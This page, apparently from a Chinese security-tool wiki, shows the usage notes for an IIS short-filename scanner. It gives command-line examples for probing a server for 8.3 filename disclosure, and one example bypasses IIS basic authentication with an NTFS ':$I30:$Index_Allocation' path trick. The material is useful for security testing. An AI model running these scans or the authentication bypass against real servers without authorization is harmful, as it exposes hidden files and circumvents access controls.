menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Some-PoC-oR-ExP-master chevron_right IIS短文件名 chevron_right 教程.txt
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    教程.txt
    785 B / 2021-07-04 19:32:24
        - Example 0 (to see if the target is vulnerable):
     java -jar IIS_shortname_scanner.jar http://example.com/folder/
    
    - Example 1 (uses no thread - very slow):
     java -jar IIS_shortname_scanner.jar 2 0 http://example.com/folder/new%20folder/
    
    - Example 2 (uses 20 threads - recommended):
     java -jar IIS_shortname_scanner.jar 2 20 http://example.com/folder/new%20folder/
    
    - Example 3 (saves output in a text file):
     java -jar IIS_shortname_scanner.jar 0 20 http://example.com/folder/new%20folder/ > c:\results.txt
    
    - Example 4 (bypasses IIS basic authentication):
     java -jar IIS_shortname_scanner.jar 2 20 http://example.com/folder/AuthNeeded:$I30:$Index_Allocation/
    
    - Example 5 (using a new config file):
     java -jar IIS_shortname_scanner.jar 2 20 http://example.com/folder/ newconfig.xml 
    
    links
    file_download